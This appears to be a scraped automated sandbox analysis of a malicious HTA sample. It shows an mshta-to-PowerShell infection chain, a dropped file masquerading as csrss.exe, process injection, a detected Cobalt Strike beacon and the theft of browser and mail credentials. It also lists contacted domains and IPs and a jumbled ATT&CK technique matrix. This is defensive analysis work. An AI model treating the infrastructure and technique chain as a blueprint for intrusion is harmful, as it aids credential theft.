                        Source: C:\Windows\SysWOW64\systeminfo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                        Source: C:\Windows\SysWOW64\systeminfo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                        Source: C:\Windows\SysWOW64\systeminfo.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                        Remote Access Functionality

                        barindex
                        Source: Yara matchFile source: 17.2.iaoqralA.pif.400000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.2.iaoqralA.pif.400000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000016.00000002.3629881400.0000000005360000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000002.3625364823.0000000002400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000002.3627870487.0000000004070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000002.3627956403.00000000040C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000002.1583072891.0000000035BE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000002.1552868362.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000014.00000002.3628025430.0000000002940000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000002.1579411162.00000000311A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire Infrastructure1
                        Valid Accounts
                        1
                        Native API
                        1
                        DLL Side-Loading
                        1
                        Abuse Elevation Control Mechanism
                        1
                        Deobfuscate/Decode Files or Information
                        1
                        OS Credential Dumping
                        1
                        System Time Discovery
                        Remote Services1
                        Archive Collected Data
                        14
                        Ingress Tool Transfer
                        Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts1
                        Shared Modules
                        1
                        Valid Accounts
                        1
                        DLL Side-Loading
                        1
                        Abuse Elevation Control Mechanism
                        LSASS Memory1
                        Account Discovery
                        Remote Desktop Protocol1
                        Data from Local System
                        1
                        Encrypted Channel
                        Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain Accounts11
                        Command and Scripting Interpreter
                        Logon Script (Windows)1
                        Valid Accounts
                        3
                        Obfuscated Files or Information
                        Security Account Manager2
                        File and Directory Discovery
                        SMB/Windows Admin Shares11
                        Email Collection
                        4
                        Non-Application Layer Protocol
                        Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal Accounts3
                        PowerShell
                        Login Hook1
                        Access Token Manipulation
                        1
                        Software Packing
                        NTDS138
                        System Information Discovery
                        Distributed Component Object ModelInput Capture14
                        Application Layer Protocol
                        Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script612
                        Process Injection
                        1
                        Timestomp
                        LSA Secrets431
                        Security Software Discovery
                        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                        DLL Side-Loading
                        Cached Domain Credentials2
                        Process Discovery
                        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items211
                        Masquerading
                        DCSync41
                        Virtualization/Sandbox Evasion
                        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                        Valid Accounts
                        Proc Filesystem1
                        Application Window Discovery
                        Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                        Access Token Manipulation
                        /etc/passwd and /etc/shadow1
                        System Owner/User Discovery
                        Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron41
                        Virtualization/Sandbox Evasion
                        Network Sniffing1
                        Remote System Discovery
                        Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                        Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd612
                        Process Injection
                        Input Capture1
                        System Network Configuration Discovery
                        Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1664904 Sample: fgd.hta Startdate: 14/04/2025 Architecture: WINDOWS Score: 100 74 www.royalbond.xyz 2->74 76 www.genericagi.xyz 2->76 78 18 other IPs or domains 2->78 88 Suricata IDS alerts for network traffic 2->88 90 Multi AV Scanner detection for dropped file 2->90 92 Multi AV Scanner detection for submitted file 2->92 96 11 other signatures 2->96 13 mshta.exe 1 2->13         started        16 svchost.exe 1 1 2->16         started        signatures3 94 Performs DNS queries to domains with low reputation 76->94 process4 dnsIp5 130 Suspicious command line found 13->130 132 PowerShell case anomaly found 13->132 19 cmd.exe 1 13->19         started        72 127.0.0.1 unknown unknown 16->72 signatures6 process7 signatures8 98 Detected Cobalt Strike Beacon 19->98 100 Suspicious powershell command line found 19->100 102 Uses ping.exe to sleep 19->102 104 2 other signatures 19->104 22 powershell.exe 45 19->22         started        27 conhost.exe 19->27         started        process9 dnsIp10 80 192.3.26.143, 49714, 80 AS-COLOCROSSINGUS United States 22->80 62 C:\Users\user\AppData\Roaming\csrss.exe, PE32 22->62 dropped 64 C:\Users\user\AppData\Local\...\csrss[1].exe, PE32 22->64 dropped 66 C:\Users\user\AppData\...\z0uhqkog.cmdline, Unicode 22->66 dropped 120 Drops PE files with benign system names 22->120 122 Loading BitLocker PowerShell Module 22->122 124 Powershell drops PE file 22->124 29 csrss.exe 6 22->29         started        33 csc.exe 3 22->33         started        file11 signatures12 process13 file14 68 C:\Users\user\Links\iaoqralA.pif, PE32 29->68 dropped 134 Multi AV Scanner detection for dropped file 29->134 136 Drops PE files with a suspicious file extension 29->136 138 Writes to foreign memory regions 29->138 140 4 other signatures 29->140 35 iaoqralA.pif 29->35         started        38 cmd.exe 1 29->38         started        40 cmd.exe 1 29->40         started        70 C:\Users\user\AppData\Local\...\z0uhqkog.dll, PE32 33->70 dropped 42 cvtres.exe 1 33->42         started        signatures15 process16 signatures17 106 Detected unpacking (changes PE section rights) 35->106 108 Maps a DLL or memory area into another process 35->108 44 4nHrKBXqqqVJFZFp.exe 35->44 injected 110 Uses ping.exe to sleep 38->110 47 conhost.exe 38->47         started        49 PING.EXE 1 38->49         started        51 conhost.exe 40->51         started        process18 signatures19 128 Found direct / indirect Syscall (likely to bypass EDR) 44->128 53 systeminfo.exe 13 44->53         started        process20 signatures21 112 Tries to steal Mail credentials (via file / registry access) 53->112 114 Tries to harvest and steal browser information (history, passwords, etc) 53->114 116 Modifies the context of a thread in another process (thread injection) 53->116 118 3 other signatures 53->118 56 4nHrKBXqqqVJFZFp.exe 53->56 injected 60 firefox.exe 53->60         started        process22 dnsIp23 82 www.lifway.life 209.74.80.150, 49731, 49732, 49733 MULTIBAND-NEWHOPEUS United States 56->82 84 x112.jieruitech.info 192.197.113.156, 49725, 80 HKKFGL-AS-APHKKwaifongGroupLimitedHK China 56->84 86 7 other IPs or domains 56->86 126 Found direct / indirect Syscall (likely to bypass EDR) 56->126 signatures24

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.